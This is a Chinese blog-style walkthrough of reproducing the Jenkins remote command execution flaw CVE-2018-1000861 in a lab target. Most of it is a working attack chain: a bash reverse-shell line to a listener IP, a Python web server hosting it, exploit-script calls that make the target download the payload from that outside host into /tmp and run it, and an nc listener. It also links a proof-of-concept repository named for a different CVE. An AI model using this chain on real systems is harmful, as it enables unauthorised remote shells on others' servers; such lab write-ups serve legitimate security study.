jekins CVE-2018-1000861 漏洞复现

jekins CVE-2018-1000861 漏洞复现

‍

名称: jenkins 命令执行 (CVE-2018-1000861)

描述: ​Jenkins 可以通过其网页界面轻松设置和配置,其中包括即时错误检查和内置帮助。 插件 通过更新中心中的 1000 多个插件,Jenkins 集成了持续集成和持续交付工具链中几乎所有的工具。 Jenkins 是常见的CI/CD服务器, 最常见的就是爆破弱口令然后使用groovy执行命令

‍

**利用项目:**​https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc

打开靶场:

​​​​

用python快速构建一个web服务,在这个网站下创建一个yyds.txt,yyds.txt里面的内容为反弹shell的命令,也就是下面这串代码

​bash -i >& /dev/tcp/192.168.91.138/9002 0>&1​

​​

开启web服务:

python3 -m http.server 9001

​​​​

访问测试一下没问题:

​​​​​​

用python2版本执行exp.py这个脚本,目的是让目标主机下载这个yyds.txt文件并保存到自己的/tmp/2.sh这个路径下

python2 exp.py http://192.168.91.129:36252/ "curl -o /tmp/2.sh http://192.168.91.138:9001/yyds.txt"

​​​​

‍

开启监听:

nc -lvvp 9002

​​​

‍

再次执行这个脚本,让目标机器执行这个2.sh文件,也就是执行了我保存在yyds.txt文件里反弹shell的命令

python2 exp.py http://192.168.91.129:36252/ "bash /tmp/2.sh"

​​

‍

相关推荐
学逆向的3 小时前
win32注入代码
开发语言·网络安全·api·win32
Web Security Loop4 小时前
MAC安装最新Burpsuite pro详细步骤教程
web安全·macos·网络安全·安全性测试
xixixi777776 小时前
解读|华为星河 AI 三层安全围栏:以 AI 守护 AI,重构智算中心 Token 生产纵深防御体系
人工智能·安全·web安全·华为·提示词注入·agent安全·模型投毒
砚凝霜7 小时前
【软考信息安全】第十三章 网络安全漏洞分类管理与扫描处置
安全·web安全
Xudde.8 小时前
CVE-2017-9993漏洞复现
笔记·学习·安全·web安全
墨云安全10 小时前
红队评估和渗透测试的区别是什么?2026 年从目标、方法到交付物的对比
网络·安全·web安全·网络安全·渗透测试
刘婉晴13 小时前
【APP安全测试】Frida 基础
网络安全
科技象限14 小时前
数据防泄密系统怎么选?看它怎么把几道防线叠成网
运维·安全·网络安全·安企神
砚凝霜14 小时前
【软考信息安全】第十六章 网络安全风险评估项目流程与应用
网络·安全·web安全
sbjdhjd15 小时前
云安全 | 从特权容器到旧版 runC:Docker 宿主机访问与运行时缺陷复盘
运维·网络安全·docker·云原生·kubernetes·云计算·云安全